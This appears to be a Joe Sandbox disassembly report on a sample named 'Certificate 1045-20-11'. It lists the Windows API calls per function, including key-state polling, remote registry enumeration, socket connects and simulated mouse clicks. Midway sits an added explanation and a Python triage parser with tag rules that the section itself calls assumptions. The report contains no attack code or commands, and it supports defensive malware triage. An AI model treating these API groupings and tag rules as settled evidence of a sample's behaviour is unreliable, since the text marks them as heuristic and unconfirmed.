                                                                                • Instruction Fuzzy Hash: 985127B5A00209AFDB14DF58C884EAAB7B8FF4C314B158559E959DB301E730EA52CBA0
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008A06EE
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 008A077D
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 008A079B
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 008A07E1
                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 008A07FB
                                                                                  • Part of subcall function 0085E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0088A574,?,?,00000000,00000008), ref: 0085E675
                                                                                  • Part of subcall function 0085E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0088A574,?,?,00000000,00000008), ref: 0085E699
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                • Opcode ID: 14d6094685b7a1143504a8faca694889116ed7d55a42828a81588387e53c5ee8
                                                                                • Instruction ID: cabb3c4b1d066f978818b019db0196a46f66a0a6e732441eb69f4be0aa3702be
                                                                                • Opcode Fuzzy Hash: 14d6094685b7a1143504a8faca694889116ed7d55a42828a81588387e53c5ee8
                                                                                • Instruction Fuzzy Hash: 5F512575A002099FDB00EFA8C881DADB7B5FF59310B14806AE915EB352DB35EE45CF81
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A2EEF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A2F2E
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008A2F75
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 008A2FA1
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A2FAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                • Opcode ID: b7d5fd7ef1e25a17863ad5ac0e731a97c3b6d6cbff52b30ec5b363f9d2c5bd32
                                                                                • Instruction ID: 30d316119f5d12926a621d71bfc8ee57d5cbe77f30673b624162e850aee1f972
                                                                                • Opcode Fuzzy Hash: b7d5fd7ef1e25a17863ad5ac0e731a97c3b6d6cbff52b30ec5b363f9d2c5bd32
                                                                                • Instruction Fuzzy Hash: 7A512771208308AFE714EB68C881E6AB7F9FF89314F04892DF595D72A1DB70E905CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 132de7c6b1f59f41ff351752d2f1a2062ddfb8b4b95490fd4cc24af1da6f389c
                                                                                • Instruction ID: 4964d7ddacba187cd43a93295d0ccd84da6aca5597775ee804320a74d32c1882
                                                                                • Opcode Fuzzy Hash: 132de7c6b1f59f41ff351752d2f1a2062ddfb8b4b95490fd4cc24af1da6f389c
                                                                                • Instruction Fuzzy Hash: D441A379900208AFEB24DF68CC44FA9BFB8FB0A314F150265F95AE76D1C770AD51DA90
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008912B4
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008912DD
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0089131C
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00891341
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00891349
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: ddb34a42bbd162e63a253bdd8c361ddad3f253146ad34f8892316396a12a28f2
                                                                                • Instruction ID: f079cf934ff8e5b0d0b35ef4c8cfe9edf46f534f9c943f48c6bcf2acc8c14f5d
                                                                                • Opcode Fuzzy Hash: ddb34a42bbd162e63a253bdd8c361ddad3f253146ad34f8892316396a12a28f2
                                                                                • Instruction Fuzzy Hash: C0411C35600209DFCF11EF68C985AAEBBF5FF09714B148099E94AAB362DB31ED01DB51
                                                                                APIs
                                                                                • GetCursorPos.USER32(000000FF), ref: 0085B64F
                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 0085B66C
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 0085B691
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0085B69F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 262306ddb61f93ba3b32da794370d7a9790eed96480ae904e29f5f77457dbc14
                                                                                • Instruction ID: 146d7df839a3868dad5cd6d5c5945ae3699e8cd8ef549c55d5e31b51051adfa1
                                                                                • Opcode Fuzzy Hash: 262306ddb61f93ba3b32da794370d7a9790eed96480ae904e29f5f77457dbc14
                                                                                • Instruction Fuzzy Hash: 07417C31508209FBDF199F68C844AE9BBB4FB15325F204219F829D6290DB30AD94DBA1
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 0087B369
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0087B413
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0087B41B
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0087B429
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0087B431
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: e4ca8abf1c4c492ab7549b2ef8b4780093ce771ca7cfdba7e3846acc531ae544
                                                                                • Instruction ID: 04a054e0a119cc627358609a94f411e23df366210010f22c4266e57f46b3722d
                                                                                • Opcode Fuzzy Hash: e4ca8abf1c4c492ab7549b2ef8b4780093ce771ca7cfdba7e3846acc531ae544
                                                                                • Instruction Fuzzy Hash: 4431ABB1900219EBDB04DF68D949B9E7BB6FB04319F118229F825EA2D1C3B0D954CB90
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0087DBD7
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0087DBF4
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0087DC2C
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0087DC52
                                                                                • _wcsstr.LIBCMT ref: 0087DC5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: ee32f5fc8cf5c8d73685801440363f720115f73d3e1138cde81c9c94d7e0761b
                                                                                • Instruction ID: ef5959b866a0f8bbb190e0db97e5e03d3ab5f15cf69520bb5cd89496274e38ef
                                                                                • Opcode Fuzzy Hash: ee32f5fc8cf5c8d73685801440363f720115f73d3e1138cde81c9c94d7e0761b
                                                                                • Instruction Fuzzy Hash: 1E210A71204304BBEB155B399C49E7B7BB8FF85760F148039F90DCA295EAB1CC41D6A1
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0087BC90
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0087BCC2
                                                                                • __itow.LIBCMT ref: 0087BCDA
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0087BD00
                                                                                • __itow.LIBCMT ref: 0087BD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 10d895b19de91f721a47bdde72d4909b22a979ba214d05203eebb3cfc01085c9
                                                                                • Instruction ID: c8e1e0ca0df27fa89024f9a64ed0a238ae5bf4c845a05ec776269e7a098a6cc9
                                                                                • Opcode Fuzzy Hash: 10d895b19de91f721a47bdde72d4909b22a979ba214d05203eebb3cfc01085c9
                                                                                • Instruction Fuzzy Hash: 8821DB75600718BBDB21AE698C46FDF7B69FF99710F008025F949EB182DB70CD0587A2
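The entries above are machine-generated, one per function Joe Sandbox lifted from the memory dump, and in a compiled AutoIt binary most of the API groupings are consistent with runtime built-ins (LoadLibraryW/GetProcAddress/FreeLibrary for DllCall, GetAsyncKeyState for key polling, PostMessageW with WM_LBUTTONDOWN then WM_LBUTTONUP for a control click) rather than evidence of malicious intent on their own. What a triage analyst usually wants is to reduce the listing to per-function capability tags and then decide which functions deserve a look in the disassembly. The Python below is an added example written for this page, not code from Joe Sandbox or from the report: it parses records in the format shown above, keeps "Part of subcall function" entries separate from a function's own calls, handles entries that have no "APIs" block (they begin directly with "Memory Dump Source"), and applies a small set of tag rules. The rule names and the meaning assigned to each API combination are this example's own assumptions, and the sample input is constructed from lines copied from this section.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Set, Tuple

# Constructed sample: API and Opcode ID lines copied from the listing on this
# page (lines the parser ignores are omitted). Record 3 has no "APIs" header.
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008A06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 008A077D
• FreeLibrary.KERNEL32(00000000,00000004), ref: 008A07FB
  • Part of subcall function 0085E65E: WideCharToMultiByte.KERNEL32(00000000,00000000), ref: 0085E675
Memory Dump Source
• Opcode ID: 14d6094685b7a1143504a8faca694889116ed7d55a42828a81588387e53c5ee8
APIs
• GetAsyncKeyState.USER32(00000001), ref: 0085B691
• GetAsyncKeyState.USER32(00000002), ref: 0085B69F
Memory Dump Source
• Opcode ID: 262306ddb61f93ba3b32da794370d7a9790eed96480ae904e29f5f77457dbc14
Memory Dump Source
• Opcode ID: 132de7c6b1f59f41ff351752d2f1a2062ddfb8b4b95490fd4cc24af1da6f389c
APIs
• PostMessageW.USER32(?,00000201,00000001), ref: 0087B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0087B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0087B429
Memory Dump Source
• Opcode ID: e4ca8abf1c4c492ab7549b2ef8b4780093ce771ca7cfdba7e3846acc531ae544
"""

# "Name.MODULE(args), ref: addr", optionally prefixed by the report's
# "Part of subcall function XXXX:" marker for APIs reached through a callee.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
MSG_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # callee address when listed as a subcall

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    opcode_id: str = ""
    seen_dump: bool = False

    def direct_names(self) -> Set[str]:
        # APIs the function itself calls; subcall entries are excluded
        return {c.name for c in self.calls if c.subcall_of is None}

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif line == "Memory Dump Source":
            if cur is None or cur.seen_dump:  # record without an APIs block
                cur = FunctionRecord()
                records.append(cur)
            cur.seen_dump = True
        elif cur is not None:
            m = API_LINE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            elif line.startswith("Opcode ID:"):
                cur.opcode_id = line.split(":", 1)[1].strip()
    return records

def posts_message(rec: FunctionRecord, msg: int) -> bool:
    # True if the function itself posts or sends window message `msg`
    for c in rec.calls:
        if c.subcall_of is None and c.name in MSG_APIS and len(c.args) > 1:
            try:
                if int(c.args[1], 16) == msg:
                    return True
            except ValueError:  # argument unresolved, shown as '?'
                pass
    return False

# Tag rules are this example's assumptions about what each API combination
# usually means; in a compiled AutoIt binary most map to runtime built-ins.
RULES: List[Tuple[str, Callable[[FunctionRecord], bool]]] = [
    ("dynamic-api-resolution", lambda r: "GetProcAddress" in r.direct_names()
     and bool(r.direct_names() & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"})),
    ("input-state-polling", lambda r: bool(r.direct_names() & {"GetAsyncKeyState", "GetKeyState"})),
    ("remote-registry-enum", lambda r: {"RegConnectRegistryW", "RegEnumKeyExW"} <= r.direct_names()),
    # WM_LBUTTONDOWN (0x201) and WM_LBUTTONUP (0x202) sent to a window handle
    ("synthetic-mouse-click", lambda r: posts_message(r, 0x201) and posts_message(r, 0x202)),
]

def tag_record(rec: FunctionRecord) -> List[str]:
    return [tag for tag, pred in RULES if pred(rec)]
```

Tags are computed from a function's own calls only; the "Part of subcall function" lines describe callees, and counting them would make every caller of the string helper at 0085E65E look as if it converts encodings itself. Where the same API is used both benignly and not, extend RULES with an argument check, as the click rule does with the message IDs, rather than matching on API names alone.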
APIs
  • Part of subcall function 008450E6: _wcsncpy.LIBCMT ref: 008450FA
• GetFileAttributesW.KERNEL32(?,?,?,?,008860C3), ref: 00886369
• GetLastError.KERNEL32(?,?,?,008860C3), ref: 00886374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008860C3), ref: 00886388
• _wcsrchr.LIBCMT ref: 008863AA
  • Part of subcall function 00886318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008860C3), ref: 008863E0
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: fa517e86c9aa5c6ec3dadedce873baee02957a73d72a9e9af1e443500df85478
• Instruction ID: 806ae39a661b1936e3c37de19e55bdf1bf2725229d5d445844f95a409dd77542
• Opcode Fuzzy Hash: fa517e86c9aa5c6ec3dadedce873baee02957a73d72a9e9af1e443500df85478
• Instruction Fuzzy Hash: FA21F3319042199BDB21BA78AC42FEA23ACFF06361F10007AF445D32C1FB60E9948B55
APIs
  • Part of subcall function 0089A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00898BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00898BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00898BFE
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: c0eabe40acfbd9c6ab80f6fc9ddd4793f062c623db7c2c10f36bdd3399e921e6
• Instruction ID: e9880b42627c6030ac5dd499c5214ad2bd0629ff8ff34c7d7e44c537db03a76d
• Opcode Fuzzy Hash: c0eabe40acfbd9c6ab80f6fc9ddd4793f062c623db7c2c10f36bdd3399e921e6
• Instruction Fuzzy Hash: 8E216D312002159FDB10BF68C885F7E77A9FB49764F084459F956EB292CE74AC018B62
APIs
• IsWindow.USER32(00000000), ref: 00898441
• GetForegroundWindow.USER32 ref: 00898458
• GetDC.USER32(00000000), ref: 00898494
• GetPixel.GDI32(00000000,?,00000003), ref: 008984A0
• ReleaseDC.USER32(00000000,00000003), ref: 008984DB
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 4ca6c94c7c2d5521dc3c3d51cdd14e46e60a23c35d5eaca2e97b7e4fe797dab0
• Instruction ID: 223b36f6588e87e0ab089fefea2a7f82e4a75d67bb6c8f33027b81036825a207
• Opcode Fuzzy Hash: 4ca6c94c7c2d5521dc3c3d51cdd14e46e60a23c35d5eaca2e97b7e4fe797dab0
• Instruction Fuzzy Hash: AB218475A00205AFDB00EFA8D845E5EBBF5FF49301F048479E85AD7251DB70AD00CB91
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
• SelectObject.GDI32(?,00000000), ref: 0085AFF2
• BeginPath.GDI32(?), ref: 0085B009
• SelectObject.GDI32(?,00000000), ref: 0085B033
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: b5b8919717f411fcc42c7592a28b67c134d10dd308629937909a6bffaf9e5a63
• Instruction ID: 8801079dc523a3c8e28ba2cbf139e8975a44804c5ab97a86be354edebc2a8ca0
• Opcode Fuzzy Hash: b5b8919717f411fcc42c7592a28b67c134d10dd308629937909a6bffaf9e5a63
• Instruction Fuzzy Hash: 61217170814709EFDB109F55EC84B9A7BB8F720356F18432AF821D21E0C3715849EB51
APIs
• __calloc_crt.LIBCMT ref: 008621A9
• CreateThread.KERNEL32(?,?,008622DF,00000000,?,?), ref: 008621ED
• GetLastError.KERNEL32 ref: 008621F7
• _free.LIBCMT ref: 00862200
• __dosmaperr.LIBCMT ref: 0086220B
  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
• Opcode ID: 9b915a25e5ce262221b6c1021d619d5ec568b2399f84a5155707add4222e6d86
• Instruction ID: ab50906d5a20390c31ff3d63c77ed11682023690a5198ac82e9468f1e068806b
• Opcode Fuzzy Hash: 9b915a25e5ce262221b6c1021d619d5ec568b2399f84a5155707add4222e6d86
• Instruction Fuzzy Hash: AD110833108746AFDB11AFA9DC41D9B7BA8FF01774B120569FE24C6241EB71D81187E2
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
• GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
• GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
• HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
